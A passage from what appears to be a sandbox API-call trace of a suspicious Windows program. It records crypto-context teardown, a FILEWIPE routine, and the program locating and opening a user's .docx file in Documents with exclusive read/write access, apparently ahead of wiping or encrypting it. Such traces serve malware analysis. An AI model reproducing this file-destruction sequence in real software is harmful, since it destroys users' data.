Size=0x8) returned 0x9c2818 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.711] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.711] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.711] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.711] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.714] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.714] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.714] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.720] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.721] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0168.721] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.721] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.722] CryptDestroyKey (hKey=0x90aed8) returned 1 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.724] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.724] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.724] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.725] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.725] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.725] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.725] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.725] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.725] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.725] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.725] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.725] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.726] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.726] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.726] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.726] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.727] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.727] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.727] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.727] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0168.727] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.728] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.728] FreeLibrary (hLibModule=0x74f20000) returned 1 [0168.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.733] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.733] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0168.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.734] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x3f09d90, ftLastWriteTime.dwHighDateTime=0x1d58c84, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 0x90ae18 [0168.734] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.734] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.734] CharLowerBuffW (in: lpsz="byte[63357]", cchLength=0xb | out: lpsz="byte[63357]") returned 0xb [0168.735] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.735] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0168.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.735] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0168.735] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0168.735] FreeLibrary (hLibModule=0x75c90000) returned 1 [0168.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.736] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.736] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0168.737] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0-mfkgr.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0168.751] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.752] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.752] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0168.752] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.752] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.753] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.753] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0168.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.753] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.753] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.754] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.754] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.754] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpFilePart=0x0) returned 0x34 [0168.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, 